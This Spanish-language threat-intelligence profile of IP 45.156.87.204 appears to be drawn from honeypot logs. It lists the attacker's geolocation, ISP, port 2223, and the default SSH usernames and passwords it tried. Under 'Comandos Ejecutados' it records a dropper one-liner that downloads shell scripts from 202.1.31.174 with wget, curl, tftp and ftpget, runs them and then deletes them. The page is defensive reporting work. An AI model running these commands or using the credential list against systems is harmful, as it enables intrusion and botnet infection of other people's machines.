Amenaza ActivaMEDIO

45.156.87.204

Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion8/1/2026
Ultima Actividad12/1/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
573
Ataques Totales
🔌
2
Puertos
📡
1
Tipos Ataque
🦠
4
Malware

Geolocalizacion

Pais
🇳🇱 Paises Bajos
Ciudad
Eygelshoven
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

cowrie

Puertos Atacados

2223

Malware Asociado

Credenciales Intentadas

🔐root/root
9x
🔐root/admin
5x
🔐root/(vacio)
4x
🔐root/icatch99
3x
🔐root/admin12345
2x
🔐admin/admin
2x
🔐user/user
2x
🔐root/root123
2x
🔐root/root12345
1x
🔐root/HH@123
1x
🔐admin/system
1x
🔐root/GG@123
1x
🔐root/EE@123
1x
🔐root/86981198
1x
🔐admin/anko
1x

Comandos Ejecutados

$echo cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *3x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *2x
$ssh -V1x
$history | tail -51x

Evaluacion de Riesgo

57
/100
BajoMedioAltoCritico